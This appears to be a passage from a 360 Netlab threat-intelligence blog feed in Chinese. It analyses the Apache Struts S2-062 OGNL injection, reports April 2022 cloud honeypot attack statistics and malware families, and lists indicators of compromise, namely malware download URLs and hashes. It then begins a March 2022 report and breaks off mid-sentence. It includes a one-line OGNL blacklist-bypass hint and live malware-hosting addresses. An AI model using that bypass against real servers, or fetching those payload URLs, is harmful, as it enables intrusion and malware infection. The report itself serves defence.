<p>&#x5B98;&#x65B9;&#x901A;&#x62A5;&#x770B;S2-062&#x662F;S2-061&#x8865;&#x4E01;&#x7684;&#x4FEE;&#x590D;&#x4E0D;&#x5B8C;&#x6574;&#x5BFC;&#x81F4;&#x7684;&#xFF0C;&#x4ECD;&#x6709;&#x6807;&#x7B7E;&#x7684;&#x5C5E;&#x6027;&#x53EF;&#x5BFC;&#x81F4;&#x4E8C;&#x6B21;OGNL&#x8868;&#x8FBE;&#x5F0F;&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;&#x3002;ComponentTagSupport&#x7684;doStartTag &#x51FD;&#x6570;&#x5F00;&#x59CB;&#x6807;&#x7B7E;&#x89E3;&#x6790;&#xFF0C;&#x8DDF;&#x8E2A;&#x8C03;&#x8BD5;&#xFF0C;&#x8FDB;&#x5165;ComponentTagSupport&#x7684;doEndTag&#x51FD;&#x6570;&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504135602369-16517485285167.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504135602369-16517485285167.png" class="kg-image"></a><br>
&#x8DDF;&#x5165;component.end&#xFF0C;&#x63A5;&#x7740;&#x8FDB;&#x5165;evaluateParams&#x51FD;&#x6570;&#xFF0C;&#x5728;evaluateParams&#x51FD;&#x6570;&#x4E2D;&#x5BF9;name&#x8FDB;&#x884C;&#x6807;&#x7B7E;&#x503C;&#x8D4B;&#x503C;&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504163547883-16517485352728.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504163547883-16517485352728.png" class="kg-image"></a><br>
&#x7EE7;&#x7EED;&#x8C03;&#x8BD5;&#xFF0C;&#x5F53;&#x6807;&#x7B7E;&#x5C5E;&#x6027;&#x4E0D;&#x5305;&#x542B;value&#x4E14;name&#x975E;&#x7A7A;&#x65F6;&#xFF0C;&#x8FDB;&#x5165;completeExpressionIfAltSyntax &#x51FD;&#x6570;&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504163937298-16517485412929.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504163937298-16517485412929.png" class="kg-image"></a><br>
&#x8DDF;&#x8FDB;completeExpressionIfAltSyntax &#x51FD;&#x6570;&#xFF0C;&#x8F93;&#x5165;&#x7684;name&#x503C; 2*16 &#x5C06;&#x88AB;&#x4FEE;&#x6539;&#x4E3A;%{2*16}&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504164049163-165174854582610.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504164049163-165174854582610.png" class="kg-image"></a></p>
<p>&#x7136;&#x540E;recursion&#x51FD;&#x6570;&#x8FD4;&#x56DE;false&#xFF0C;&#x4ECE;&#x800C;&#x8FDB;&#x5165;findValue&#x89E6;&#x53D1;&#x4E8C;&#x6B21;OGNL&#x8868;&#x8FBE;&#x5F0F;&#x6CE8;&#x5165;&#xFF0C;&#x6267;&#x884C;&#x4E86;%{2*16}&#x8868;&#x8FBE;&#x5F0F;&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504164620635-165174855049011.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504164620635-165174855049011.png" class="kg-image"></a><br>
&#x5728;Struts v2.5.26&#x4E2D;org.apache.tomcat&#x88AB;&#x52A0;&#x5165;&#x9ED1;&#x540D;&#x5355;&#xFF0C;&#x6839;&#x636E;OGNL&#x8BED;&#x6CD5;&#xFF0C;&#x53EF;&#x901A;&#x8FC7;#@org.apache.commons.collections.BeanMap@{}&#x83B7;&#x53D6;BeanMap&#x5BF9;&#x8C61;&#xFF0C;&#x4ECE;&#x800C;&#x7ED5;&#x8FC7;S2_061&#x7684;&#x8865;&#x4E01;&#x3002;</p>
<h4 id>&#x6F0F;&#x6D1E;&#x4FEE;&#x590D;</h4>
<p>&#x5728;Struts v2.5.30&#x7248;&#x672C;&#x4E2D;&#xFF0C;&#x65B0;&#x589E;isAcceptableExpression&#x51FD;&#x6570;&#xFF0C;&#x901A;&#x8FC7;&#x6B63;&#x5219;&#x8868;&#x8FBE;&#x5F0F;&#x5224;&#x65AD;&#x7684;&#x65B9;&#x5F0F;&#x4FEE;&#x8865;&#x6F0F;&#x6D1E;&#xFF1A;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504172557824-165174855462412.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504172557824-165174855462412.png" class="kg-image"></a><br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504173327346-165174855870213.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504173327346-165174855870213.png" class="kg-image"></a></p>
<h2 id>&#x4E91;&#x670D;&#x52A1;&#x5668;&#x653B;&#x51FB;&#x603B;&#x4F53;&#x60C5;&#x51B5;</h2>
<!--kg-card-end: markdown--><blockquote>4&#x6708;&#x4EFD;&#x5171;&#x76D1;&#x6D4B;&#x5230;&#x5168;&#x7403;9.2&#x4E07;&#x4E2A;&#x8BBF;&#x95EE;&#x871C;&#x7F50;&#x8282;&#x70B9;&#x7684;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x5176;&#x4E2D;2.4&#x4E07;&#x4E2A;IP&#x53D1;&#x751F;&#x6F0F;&#x6D1E;&#x626B;&#x63CF;&#x548C;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#xFF0C;&#x8D85;6000&#x4E2A;IP&#x53D1;&#x751F;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F20;&#x64AD;&#x884C;&#x4E3A;&#xFF0C;1.1&#x4E07;&#x4E2A;IP&#x53D1;&#x751F;&#x5BC6;&#x7801;&#x7206;&#x7834;&#x884C;&#x4E3A;&#x3002;</blockquote><!--kg-card-begin: markdown--><p>&#x56DB;&#x6708;&#x4EFD;&#x6211;&#x4EEC;&#x5171;&#x6355;&#x83B7;&#x5230;&#x6765;&#x81EA;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x7684;&#x626B;&#x63CF;&#x548C;&#x653B;&#x51FB;&#x5A01;&#x80C1;3.67&#x4EBF;&#x6B21;&#x3002;&#x5176;&#x4E2D;&#xFF0C;&#x8FDB;&#x884C;&#x6F0F;&#x6D1E;&#x626B;&#x63CF;&#x548C;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;2400&#x4E07;&#x6B21;&#xFF0C;&#x5171;&#x6D89;&#x53CA;386&#x4E2A;&#x6F0F;&#x6D1E;&#xFF0C;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x4E8B;&#x4EF6;2200&#x4E07;&#x6B21;&#xFF0C;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4E8B;&#x4EF6;77.2&#x4E07;&#x6B21;&#xFF0C;&#x6D89;&#x53CA;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x5BB6;&#x65CF;236&#x4E2A;&#x3002;<br>
&#x963F;&#x91CC;&#x4E91;&#x3001;DigitalOcean&#x548C;&#x817E;&#x8BAF;&#x4E91;&#x662F;&#x53D1;&#x8D77;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x7684;IP&#x6570;&#x91CF;&#x6700;&#x591A;&#x7684;&#x4E09;&#x5BB6;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/05/image-20220505115608134.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220505115608134.png" class="kg-image"></a></p>
<p>&#x603B;&#x4F53;&#x4E0A;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x901A;&#x5E38;&#x4F7F;&#x7528;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x3001;&#x6F0F;&#x6D1E;&#x63A2;&#x6D4B;&#x548C;&#x626B;&#x63CF;&#x3001;&#x8FDC;&#x7A0B;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x6F0F;&#x6D1E;&#x7B49;&#x65B9;&#x6CD5;&#x53D1;&#x8D77;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220506104155557.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220506104155557.png" class="kg-image"></a></p>
<p>&#x5728;&#x5177;&#x4F53;&#x7684;&#x653B;&#x51FB;&#x65B9;&#x6CD5;&#x4E0A;&#xFF0C;Redis&#x76F8;&#x5173;&#x6F0F;&#x6D1E;&#x3001;&#x654F;&#x611F;&#x6587;&#x4EF6;&#x55C5;&#x63A2;&#x548C;SMTP&#x534F;&#x8BAE;&#x626B;&#x63CF;&#x7B49;&#x662F;&#x653B;&#x51FB;&#x8005;&#x6700;&#x5E38;&#x7528;&#x7684;&#x653B;&#x51FB;&#x624B;&#x6BB5;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220506134605931.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220506134605931.png" class="kg-image"></a><br>
&#x4ECE;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x9488;&#x5BF9;&#x7684;&#x5382;&#x5546;&#x548C;&#x4EA7;&#x54C1;&#x5206;&#x6790;&#xFF0C;Redis&#x3001;Docker&#x548C;Apache&#x4ECD;&#x7136;&#x662F;&#x653B;&#x51FB;&#x8005;&#x4F7F;&#x7528;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x6700;&#x591A;&#x7684;&#x5382;&#x5546;/&#x4EA7;&#x54C1;&#xFF0C;&#x5176;&#x4E2D;Redis&#x7684;&#x653B;&#x51FB;&#x8005;&#x6570;&#x91CF;&#x53D8;&#x5316;&#x4E0D;&#x5927;&#xFF0C;&#x4F46;Docker&#x7684;&#x653B;&#x51FB;&#x8005;&#x6570;&#x91CF;&#x8F83;&#x4E09;&#x6708;&#x6709;&#x6BD4;&#x8F83;&#x660E;&#x663E;&#x7684;&#x63D0;&#x5347;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220509192246030.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220509192246030.png" class="kg-image"></a><br>
&#x4E00;&#x4E9B;&#x653B;&#x51FB;&#x8005;&#x5229;&#x7528;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x7684;&#x540C;&#x65F6;&#xFF0C;&#x8FD8;&#x4F1A;&#x4F20;&#x64AD;&#x6728;&#x9A6C;&#x75C5;&#x6BD2;&#x7B49;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4EE5;&#x8FBE;&#x5230;&#x6316;&#x77FF;&#x3001;&#x63A7;&#x5236;&#x7B49;&#x76EE;&#x7684;&#x3002;4&#x6708;&#x4EFD;&#x5171;&#x6355;&#x83B7;&#x5230;&#x5229;&#x7528;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x4F20;&#x64AD;&#x7684;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x6837;&#x672C;5350&#x4E2A;&#xFF0C;&#x65E5;&#x5747;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F1A;&#x8BDD;2.57&#x4E07;&#x6B21;&#x3002;&#x5728;&#x5229;&#x7528;&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;&#x7684;&#x6076;&#x610F;&#x6837;&#x672C;&#x4E2D;&#xFF0C;&#x6316;&#x77FF;&#x7C7B;&#xFF08;CoinMiner&#xFF09;&#x7684;&#x4F20;&#x64AD;IP&#x6570;&#x91CF;&#x548C;&#x4F1A;&#x8BDD;&#x6570;&#x91CF;&#x6700;&#x591A;&#xFF0C;&#x6B64;&#x5916;&#xFF0C;&#x6728;&#x9A6C;&#x4E0B;&#x8F7D;&#x5668;&#x7C7B;&#xFF08;TrojanDownloader&#xFF09;&#x3001;&#x9ED1;&#x5BA2;&#x5DE5;&#x5177;&#x7C7B;&#xFF08;HackTool&#xFF09;&#x3001;Tsunami&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7B49;&#x4E5F;&#x662F;&#x4F20;&#x64AD;&#x8F83;&#x591A;&#x7684;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x5BB6;&#x65CF;&#x7C7B;&#x578B;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220510164811165.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220510164811165.png" class="kg-image"></a></p>
<p>&#x5177;&#x4F53;&#x6765;&#x770B;&#xFF0C;&#x5168;&#x7403;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F1A;&#x8BDD;&#x65E5;&#x5747;34.4&#x4E07;&#x6B21;&#xFF0C;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x6587;&#x4EF6;&#x6570;&#x91CF;&#x8D85;&#x8FC7;5000&#x4E2A;&#xFF0C;&#x4F20;&#x64AD;&#x4F1A;&#x8BDD;&#x4EE5;&#x6316;&#x77FF;&#x7C7B;&#xFF08;CoinMiner&#xFF09;&#x3001;Mirai&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7A0B;&#x5E8F;&#x548C;Root&#x5DE5;&#x5177;&#x7C7B;&#xFF08;Rootkit&#xFF09;&#x4E3A;&#x4E3B;&#xFF0C;&#x4E3B;&#x8981;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F20;&#x64AD;&#x6570;&#x636E;&#x5982;&#x4E0B;&#x8868;&#x6240;&#x793A;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x5BB6;&#x65CF;</th>
<th>&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x6837;&#x672C;&#x6570;&#x91CF;</th>
<th>&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F20;&#x64AD;&#x4F1A;&#x8BDD;&#x6570;&#x91CF;</th>
</tr>
</thead>
<tbody>
<tr>
<td>CoinMiner</td>
<td>132</td>
<td>3492059</td>
</tr>
<tr>
<td>Mirai</td>
<td>3528</td>
<td>2225752</td>
</tr>
<tr>
<td>Rootkit</td>
<td>8</td>
<td>1293556</td>
</tr>
<tr>
<td>Gafgyt</td>
<td>858</td>
<td>1199324</td>
</tr>
<tr>
<td>TrojanDownloader</td>
<td>446</td>
<td>764117</td>
</tr>
<tr>
<td>HackTool</td>
<td>9</td>
<td>338871</td>
</tr>
<tr>
<td>Tsunami</td>
<td>28</td>
<td>266909</td>
</tr>
<tr>
<td>YellowDye</td>
<td>8</td>
<td>265361</td>
</tr>
<tr>
<td>RemoteAdmin</td>
<td>1</td>
<td>259459</td>
</tr>
<tr>
<td>Exploit</td>
<td>46</td>
<td>28327</td>
</tr>
</tbody>
</table>
<p>&#x4E2D;&#x56FD;&#x56FD;&#x5185;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F1A;&#x8BDD;&#x65E5;&#x5747;19.5&#x4E07;&#x6B21;&#xFF0C;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x6587;&#x4EF6;&#x6570;&#x91CF;770&#x4E2A;&#xFF0C;&#x4F20;&#x64AD;&#x4F1A;&#x8BDD;&#x4EE5;&#x6316;&#x77FF;&#x7C7B;&#xFF08;CoinMiner&#xFF09;&#x3001;Root&#x5DE5;&#x5177;&#x7C7B;&#xFF08;Rootkit&#xFF09;&#x548C;&#x6728;&#x9A6C;&#x4E0B;&#x8F7D;&#x5668;&#x7C7B;&#xFF08;TrojanDownloader&#xFF09;&#x4E3A;&#x4E3B;&#xFF0C;&#x4E3B;&#x8981;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F20;&#x64AD;&#x6570;&#x636E;&#x5982;&#x4E0B;&#x8868;&#x6240;&#x793A;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x5BB6;&#x65CF;</th>
<th>&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x6837;&#x672C;&#x6570;&#x91CF;</th>
<th>&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F20;&#x64AD;&#x4F1A;&#x8BDD;&#x6570;&#x91CF;</th>
</tr>
</thead>
<tbody>
<tr>
<td>CoinMiner</td>
<td>57</td>
<td>3107750</td>
</tr>
<tr>
<td>Rootkit</td>
<td>8</td>
<td>1135539</td>
</tr>
<tr>
<td>TrojanDownloader</td>
<td>49</td>
<td>495456</td>
</tr>
<tr>
<td>HackTool</td>
<td>5</td>
<td>303781</td>
</tr>
<tr>
<td>YellowDye</td>
<td>8</td>
<td>233292</td>
</tr>
<tr>
<td>RemoteAdmin</td>
<td>1</td>
<td>232013</td>
</tr>
<tr>
<td>Tsunami</td>
<td>12</td>
<td>228386</td>
</tr>
<tr>
<td>Mirai</td>
<td>500</td>
<td>101470</td>
</tr>
<tr>
<td>Exploit</td>
<td>19</td>
<td>4921</td>
</tr>
<tr>
<td>Kryptik</td>
<td>3</td>
<td>666</td>
</tr>
</tbody>
</table>
<p>&#x6211;&#x4EEC;&#x4ECE;&#x653B;&#x51FB;&#x8005;&#x4E0B;&#x8F7D;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x7684;URL&#x4E2D;&#x63D0;&#x53D6;&#x51FA;&#x4E86;&#x8FD9;&#x4E9B;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4E0B;&#x8F7D;&#x670D;&#x52A1;&#x5668;&#x7684;&#x57DF;&#x540D;&#x6216;IP&#xFF0C;&#x88AB;&#x6700;&#x591A;&#x653B;&#x51FB;&#x8005;&#x4F7F;&#x7528;&#x7684;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4E0B;&#x8F7D;&#x670D;&#x52A1;&#x5668;&#x6709;oracle.zzhreceive.top&#xFF0C;bbq.zzhreceive.top&#x7B49;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220506114703626.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220506114703626.png" class="kg-image"></a><br>
&#x5BC6;&#x7801;&#x7206;&#x7834;&#x653B;&#x51FB;&#x65B9;&#x9762;&#xFF0C;SSH&#x7684;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x4ECD;&#x7136;&#x6700;&#x4E3A;&#x5E38;&#x89C1;&#xFF0C;&#x968F;&#x540E;&#x662F;Telnet&#x548C;&#x7532;&#x9AA8;&#x6587;&#x516C;&#x53F8;&#x7684;Oracle TNS&#x534F;&#x8BAE;&#x3002;DigitalOcean&#x3001;&#x817E;&#x8BAF;&#x4E91;&#x548C;&#x4E9A;&#x9A6C;&#x900A;AWS&#x662F;&#x7206;&#x7834;&#x653B;&#x51FB;&#x6E90;IP&#x6570;&#x91CF;&#x6700;&#x591A;&#x7684;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220506141358361.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220506141358361.png" class="kg-image"></a></p>
<h2 id>&#x8054;&#x7CFB;&#x6211;&#x4EEC;</h2>
<p>&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x5728; <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com"><strong>twitter</strong></a> &#x6216;&#x8005;&#x901A;&#x8FC7;&#x90AE;&#x4EF6;<strong>netlab[at]360.cn</strong>&#x8054;&#x7CFB;&#x6211;&#x4EEC;&#x3002;</p>
<h2 id="ioclist">IoC List</h2>
<p>URL&#xFF1A;</p>
<pre><code>http://146.70.80.113/suite
http://103.136.40.243/bins/Cronarm5
http://103.136.40.243/z.sh
http://175.11.71.224:58786/i
http://119.179.214.255:48348/bin.sh
</code></pre>
<p>md5&#xFF1A;</p>
<pre><code>97c3be113298ba1cf7acd6159391bc8c
0f77be12a7951073144b264f4cc0bb27
fdadd6050aec5f744d8e4e7118f95fc6
eec5c6c219535fba3a0492ea8118b397
59ce0baba11893f90527fc951ac69912
</code></pre>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[公有云网络安全威胁情报（202203）]]></title><description><![CDATA[<h3 id="-">&#x6982;&#x8FF0;</h3><blockquote>&#x672C;&#x6587;&#x805A;&#x7126;&#x4E8E;&#x4E91;&#x4E0A;&#x91CD;&#x70B9;&#x8D44;&#x4EA7;&#x7684;&#x626B;&#x63CF;&#x653B;&#x51FB;&#x3001;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x603B;&#x4F53;&#x653B;&#x51FB;&#x60C5;&#x51B5;&#x5206;&#x6790;&#x3001;&#x70ED;&#x95E8;&#x6F0F;&#x6D1E;&#x53CA;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x7684;&#x653B;&#x51FB;&#x5A01;&#x80C1;&#x3002;</blockquote><ul><li><a href="https://netlab.360.com/zh/honeypot?ref=blog.netlab.360.com">360&#x9AD8;&#x7EA7;</a></li></ul>]]></description><link>https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53014</guid><category><![CDATA[公有云威胁情报]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><dc:creator><![CDATA[360Netlab]]></dc:creator><pubDate>Tue, 19 Apr 2022 02:24:17 GMT</pubDate><content:encoded><![CDATA[<h3 id="-">&#x6982;&#x8FF0;</h3><blockquote>&#x672C;&#x6587;&#x805A;&#x7126;&#x4E8E;&#x4E91;&#x4E0A;&#x91CD;&#x70B9;&#x8D44;&#x4EA7;&#x7684;&#x626B;&#x63CF;&#x653B;&#x51FB;&#x3001;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x603B;&#x4F53;&#x653B;&#x51FB;&#x60C5;&#x51B5;&#x5206;&#x6790;&#x3001;&#x70ED;&#x95E8;&#x6F0F;&#x6D1E;&#x53CA;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x7684;&#x653B;&#x51FB;&#x5A01;&#x80C1;&#x3002;</blockquote><ul><li><a href="https://netlab.360.com/zh/honeypot?ref=blog.netlab.360.com">360&#x9AD8;&#x7EA7;&#x5A01;&#x80C1;&#x72E9;&#x730E;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;</a>&#x53D1;&#x73B0;&#x5168;&#x7403;12&#x4E07;&#x4E2A;&#x4E91;&#x670D;&#x52A1;&#x5668;IP&#xFF0C;&#x8FDB;&#x884C;&#x7F51;&#x7EDC;&#x626B;&#x63CF;&#x3001;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x3001;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x7B49;&#x884C;&#x4E3A;&#x3002;&#x5176;&#x4E2D;&#x5305;&#x62EC;&#x56FD;&#x5185;156&#x5BB6;&#x5355;&#x4F4D;&#x7684;&#x670D;&#x52A1;&#x5668;IP&#xFF0C;&#x6D89;&#x53CA;&#x5927;&#x578B;&#x592E;&#x4F01;&#x3001;&#x653F;&#x5E9C;&#x673A;&#x5173;&#x7B49;&#x884C;&#x4E1A;&#x3002;</li><li>Spring&#x5382;&#x5546;&#x8FDE;&#x7EED;&#x516C;&#x5F00;3&#x4E2A;&#x5173;&#x952E;&#x6F0F;&#x6D1E;&#xFF0C;CVE-2022-22947&#x3001;CVE-2022-22963&#x3001;CVE-2022-22965&#xFF0C;&#x672C;&#x6587;&#x5C06;&#x5BF9;&#x524D;&#x4E24;&#x4E2A;&#x6F0F;&#x6D1E;&#x8FDB;&#x884C;&#x7EC6;&#x8282;&#x5206;&#x6790;&#xFF0C;&#x7B2C;&#x4E09;&#x4E2A;&#x6F0F;&#x6D1E;&#x7EC6;&#x8282;<a href="https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory/">&#x70B9;&#x6B64;&#x67E5;&#x770B;</a>&#x3002;</li><li>&#x672C;&#x6708;&#x5171;&#x8BB0;&#x5F55;&#x5A01;&#x80C1;&#x653B;&#x51FB;8&#x4EBF;&#x6B21;&#x6709;&#x4F59;&#xFF08;&#x5176;&#x4E2D;&#x5305;&#x62EC;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;7.4&#x4EBF;&#x4F59;&#x6B21;&#x3001;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x8D85;5500&#x4E07;&#x6B21;&#xFF09;&#xFF0C;&#x65B0;&#x589E;IoC&#x7D2F;&#x8BA1;68&#x4E07;&#x4F59;&#x4E2A;&#xFF0C;&#x5176;&#x4E2D;&#x9488;&#x5BF9;IoT&#x8BBE;&#x5907;&#x7684;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x5448;&#x4E0A;&#x5347;&#x8D8B;&#x52BF;&#x3002;</li></ul><h3 id="--1">&#x4E91;&#x4E0A;&#x91CD;&#x70B9;&#x8D44;&#x4EA7;&#x626B;&#x63CF;&#x653B;&#x51FB;</h3><blockquote>&#x4E09;&#x6708;&#x4EFD;&#xFF0C;&#x6211;&#x4EEC;&#x5171;&#x76D1;&#x6D4B;&#x5230;&#x5168;&#x56FD;156&#x4E2A;&#x516C;&#x6709;&#x4E91;&#x91CD;&#x70B9;&#x8D44;&#x4EA7;&#x5B58;&#x5728;&#x5F02;&#x5E38;&#x626B;&#x63CF;&#x53CA;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#x3002;</blockquote><p>&#x968F;&#x7740;&#x4E1A;&#x52A1;&#x4E0D;&#x65AD;&#x4E0A;&#x4E91;&#xFF0C;&#x53D1;&#x751F;&#x5728;&#x516C;&#x6709;&#x4E91;&#x5E73;&#x53F0;&#x4E0A;&#x7684;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x4E8B;&#x4EF6;&#x548C;&#x5A01;&#x80C1;&#x6570;&#x91CF;&#x5C45;&#x9AD8;&#x4E0D;&#x4E0B;&#xFF0C;&#x56FD;&#x5185;&#x91CD;&#x70B9;&#x884C;&#x4E1A;&#x5305;&#x62EC;&#x4F46;&#x4E0D;&#x9650;&#x4E8E;&#x6211;&#x56FD;&#x7684;&#x79D1;&#x7814;&#x673A;&#x6784;&#x3001;&#x5927;&#x578B;&#x4F01;&#x4E1A;&#x3001;&#x653F;&#x5E9C;&#x53CA;&#x4E8B;&#x4E1A;&#x5355;&#x4F4D;&#x6210;&#x4E3A;&#x653B;&#x51FB;&#x8005;&#x7684;&#x91CD;&#x70B9;&#x653B;&#x51FB;&#x5BF9;&#x8C61;&#xFF0C;&#x5408;&#x8BA1;&#x653B;&#x51FB;&#x6E90;156&#x4E2A;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-54.png" class="kg-image" alt loading="lazy"></figure><p>&#x6839;&#x636E;&#x6240;&#x5C5E;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x6765;&#x6E90;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x6211;&#x56FD;&#x91CD;&#x70B9;IP&#x7684;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x4EE5;&#x963F;&#x91CC;&#x4E91;&#x4F7F;&#x7528;&#x4E3A;&#x4E3B;&#xFF0C;&#x5176;&#x6B21;&#x4E3A;&#x817E;&#x8BAF;&#x4E91;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-51.png" class="kg-image" alt loading="lazy"></figure><p>&#x4ECE;&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x7684;&#x89D2;&#x5EA6;&#x6765;&#x770B;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x4E3B;&#x8981;&#x901A;&#x8FC7;SSH&#x66B4;&#x529B;&#x7834;&#x89E3;&#x3001;Gitlab&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x6F0F;&#x6D1E;&#x3001;Redis&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7684;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x65B9;&#x5F0F;&#x5BF9;&#x6211;&#x56FD;&#x516C;&#x6709;&#x4E91;&#x91CD;&#x70B9;IP&#x8FDB;&#x884C;&#x653B;&#x51FB;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-52.png" class="kg-image" alt loading="lazy"></figure><p>&#x4E0B;&#x8868;&#x4E3A;&#x5176;&#x4E2D;&#x90E8;&#x5206;&#x6848;&#x4F8B;&#xFF1A;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2022/04/image-29.png" class="kg-image" alt loading="lazy"></figure><p>&#x6848;&#x4F8B;1&#xFF1A;&#x4F4D;&#x4E8E;&#x5317;&#x4EAC;&#x7684;IP&#x5730;&#x5740;&#x4E3A;39.101.*.* 